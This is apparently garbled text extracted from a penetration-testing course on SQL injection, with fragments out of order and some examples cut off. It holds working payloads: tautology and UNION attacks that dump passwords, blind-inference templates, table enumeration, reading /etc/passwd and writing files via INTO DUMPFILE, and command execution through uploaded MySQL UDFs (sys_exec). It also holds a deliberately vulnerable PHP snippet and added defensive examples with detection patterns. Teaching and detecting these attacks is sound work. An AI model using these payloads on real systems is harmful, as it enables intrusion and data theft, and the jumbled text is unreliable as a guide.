4 SQL Injections
4.6. SQLMap
The above code queries the database, asking for the name
and the description of a record in the products table. In
this example, the selected record will have an id value equal to 9.
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
In order to better understand SQLi you need to know the
basic syntax of a SELECT statement:
https://www.w3schools.com/sql/sql_intro.asp
• The result of the query is a table containing a row with the Hat
item and all the usernames and passwords from the Accounts
table:
Name    Description
Hat     Black hat
admin   HxZsO9AR
staff   ihKdNTU4
user    Iwsi7Ks8
• You can also perform a UNION operation with some
chosen data:
> SELECT Name, Description FROM Products WHERE ID='3' UNION SELECT 'Example', 'Data';
$dbhostname='1.2.3.4';
$dbuser='username';
$dbpassword='password';
$dbname='database';
$id = $_GET['id'];
' OR 'a'='a
Error Management
Example:
To exploit an error-based injection, the penetration tester needs to
use advanced DBMS features. Errors could be sent either via the
web application output or by other means such as automated
reports or warning emails.
A web application vulnerable to blind SQL injection does not
reflect the results of the injection on the output. In this case
the penetration tester must find an inference method to
exploit the vulnerability.
Don’t worry!!
Everything you have just seen will all fall into place!
Example:
You have an error in your SQL syntax. Check the manual that
corresponds to your MySQL server version for the right syntax to
use near [query snippet]
SELECT <field list> FROM <table> UNION SELECT <field list> FROM <another table>;
Users
user_id (int)   Cc_num (int)          CVS (int)
1               0000 1111 2222 3333   123
2               0123 4567 8901 2345   321
<?php
$rs=mysql_query("SELECT real_name FROM users WHERE id=".$_GET['id'].";");
$row=mysql_fetch_assoc($rs);
echo $row['real_name'];
?>
SQL injection!
This comments out any other SQL code which could follow
our injection point.
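As an added example (not code from the course), the concatenation mistake in the PHP above and its hardened form side by side, using Python's sqlite3 with a constructed in-memory database in place of MySQL; the table contents and function names are assumptions.

```python
import sqlite3

# Constructed in-memory stand-in for the deck's products and accounts tables
# (sample rows only, not the course's database).
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, description TEXT);
        INSERT INTO products VALUES (3, 'Hat', 'Black hat'), (9, 'Cap', 'Red cap');
        CREATE TABLE accounts (username TEXT, password TEXT);
        INSERT INTO accounts VALUES ('admin', 'HxZsO9AR'), ('user', 'Iwsi7Ks8');
    """)
    return conn

def lookup_vulnerable(conn, user_id):
    # Same mistake as the PHP above: untrusted input is concatenated into the
    # query text, so quotes and keywords inside it are parsed as SQL.
    sql = "SELECT name, description FROM products WHERE id='" + user_id + "'"
    return conn.execute(sql).fetchall()

def lookup_bound(conn, user_id):
    # Parameter binding alone: the value travels separately from the SQL text
    # and is only ever compared against the id column, never parsed as SQL.
    sql = "SELECT name, description FROM products WHERE id=?"
    return conn.execute(sql, (user_id,)).fetchall()

def lookup_hardened(conn, user_id):
    # Defence in depth: allow-list the input (an id is digits only) before
    # binding it, and fail with a generic message rather than a DBMS error.
    if not user_id.isdigit():
        raise ValueError("Please enter a valid id")
    return lookup_bound(conn, int(user_id))

if __name__ == "__main__":
    db = build_db()
    print(lookup_vulnerable(db, "' OR 'a'='a"))   # every product row
    print(lookup_bound(db, "' OR 'a'='a"))        # []
    print(lookup_hardened(db, "3"))               # [('Hat', 'Black hat')]
```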
There are many things to note in the previous attack:
• The field types of the second SELECT statement should match
the ones in the first statement
• The number of fields in the second SELECT statement should
match the number of the fields in the first statement
• To successfully perform the attack, we need to know the
structure of the database in terms of tables and column
names
• MySQL error:
The used SELECT statements have a different number of columns
• MS SQL error:
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists
• PostgreSQL error:
ERROR: each UNION query must have the same number of columns
• Oracle error:
SELECT field1, field2 FROM table where id='1138' UNION SELECT null, null; -- -
<remainder of the original query>
• To:
This is the part of the SQL that will trigger the error.
We are asking the database to look for integer value 1 within
a varchar column.
Example:
• xtype='U'
• Means that we are only interested in user defined tables
• name NOT IN ('<known table list>')
• name is a column of the "sysobjects" special table. Every time
we find a new table we will append it to the NOT IN list. This is
needed because the error displays only the first table name
Example:
If a database contains three tables:
• HR
• Customers
• Products
<known table list> will:
• Be empty in the first payload. ... name NOT IN ('') will
work!
• Contain 'HR' at the second step
• Contain 'HR', 'Customers', 'Products' at the last step
After retrieving the tables of a database, it is also possible to
recover the columns of each table. This is the schema of the
database and we can retrieve it by using the following
payload template:
ASCII(UPPER(SUBSTRING((<query>),<position>,1)))=ASCII(SUBSTRING((<query>),<position>,1))
ASCII(LOWER(SUBSTRING((<query>),<position>,1)))=ASCII(SUBSTRING((<query>),<position>,1))
You can also copy the POST string from a request intercepted
with Burp Proxy.
// Allow-list check: only letters, whitespace and hyphens, case-insensitive
if (!preg_match('|^[a-z\s-]+$|i', $name)) {
    die('Please enter a valid name');
}
The victim server will connect to our SQL server, read the exe
file from the table and recreate it remotely.
Now that you know everything about advanced exploitation
of SQL Server, let’s see a technique to save the results of
these stored procedures in a temporary table.
Then we can read the results by using some data dumping
techniques.
create table temptable (id int not null identity (1,1), output nvarchar(4096) null);--
0x640069007200200063003a005c00
https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html#priv_file
By using this method, you can convert any binary file to a long
hex string that you can use to steal any data from the server.
+--------------------------------------------------------------------------------+
| output |
+--------------------------------------------------------------------------------+
| root:x:0:0:root:/root:/bin/bash |
| daemon:x:1:1:daemon:/usr/sbin:/bin/sh |
| bin:x:2:2:bin:/bin:/bin/sh |
| sys:x:3:3:sys:/dev:/bin/sh |
| sync:x:4:65534:sync:/bin:/bin/sync |
| games:x:5:60:games:/usr/games:/bin/sh |
| . . . |
+--------------------------------------------------------------------------------+
But, how can you load a binary file into a table via SQL
injections?
You have to convert it into a hex string.
And how can you do that?
By using MySQL!
Example:
mysql> LOAD DATA INFILE '/tmp/ls.dmp' INTO TABLE mytable FIELDS TERMINATED BY 'sOmErandOM'
LINES TERMINATED BY 'oTHerRnD' (data);
Query OK, 1 row affected (0.01 sec)
Records: 1 Deleted: 0 Skipped: 0 Warnings: 0
First you have to perform an insert with the first chunk. Next,
you have to update the field by adding the other chunks.
SELECT <victim field> FROM <victim table> WHERE <optional conditions> INTO DUMPFILE '<output path>';
Then you can use them. You can find the source code of those
functions here. Moreover you can find the compiled versions
in the SQLMap repository.
http://www.mysqludf.org/
https://github.com/sqlmapproject/sqlmap/tree/master/udf/mysql
After uploading the files to the target system, running a
command is just a matter of performing a SELECT:
SELECT sys_eval('<command>');
SELECT sys_exec('<command>');
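An added detection example, not part of the original deck, that checks web server access-log lines for the payload shapes this deck walks through: the `' OR 'a'='a` tautology, UNION SELECT, the ASCII/UPPER/SUBSTRING inference used in blind injection, and INTO DUMPFILE / LOAD DATA INFILE file access. The log lines, IP addresses, signature names and log format are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed combined-log style lines (sample traffic, not real data).
LOG_LINES = [
    '10.0.0.5 - - [12/Mar/2018:10:01:02 +0000] "GET /products.php?id=9 HTTP/1.1" 200 734',
    '10.0.0.9 - - [12/Mar/2018:10:01:05 +0000] "GET /products.php?id=%27%20OR%20%27a%27%3D%27a HTTP/1.1" 200 9120',
    '10.0.0.9 - - [12/Mar/2018:10:01:09 +0000] "GET /products.php?id=3%27%20UNION%20SELECT%20username,password%20FROM%20accounts%20--%20- HTTP/1.1" 200 1480',
    '10.0.0.9 - - [12/Mar/2018:10:02:31 +0000] "GET /products.php?id=1%27%20AND%20ASCII(UPPER(SUBSTRING((SELECT%20name%20FROM%20users),1,1)))%3DASCII(SUBSTRING((SELECT%20name%20FROM%20users),1,1))%20--%20- HTTP/1.1" 200 734',
    '10.0.0.9 - - [12/Mar/2018:10:05:00 +0000] "GET /products.php?id=1%27%20UNION%20SELECT%20data,null%20FROM%20mytable%20INTO%20DUMPFILE%20%27/tmp/out%27%20--%20- HTTP/1.1" 500 311',
]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Payload shapes covered by this deck; a starting point, not a complete ruleset.
SIGNATURES = {
    "tautology": re.compile(r"'\s*OR\s*'[^']*'\s*=\s*'", re.I),
    "union_select": re.compile(r"\bUNION\b(?:\s+ALL)?\s+SELECT\b", re.I),
    "blind_inference": re.compile(r"\bASCII\s*\(\s*(?:UPPER|LOWER)?\s*\(?\s*SUBSTRING\s*\(", re.I),
    "file_access": re.compile(r"\bINTO\s+(?:OUT|DUMP)FILE\b|\bLOAD\s+DATA\s+(?:LOCAL\s+)?INFILE\b", re.I),
}

def scan_log(lines):
    """Return one record per request whose URL-decoded query string matches a signature."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of aborting the scan
        path = m.group("path")
        query = unquote_plus(path.partition("?")[2])  # decode %27 -> ' and %20 -> space
        hits = [name for name, rx in SIGNATURES.items() if rx.search(query)]
        if hits:
            findings.append({"ip": m.group("ip"), "time": m.group("ts"), "path": path, "hits": hits})
    return findings

def suspicious_clients(findings):
    """Count flagged requests per client IP to show which source to look at first."""
    return dict(Counter(f["ip"] for f in findings))

if __name__ == "__main__":
    found = scan_log(LOG_LINES)
    for f in found:
        print(f["time"], f["ip"], f["hits"])
    print(suspicious_clients(found))   # {'10.0.0.9': 4}
```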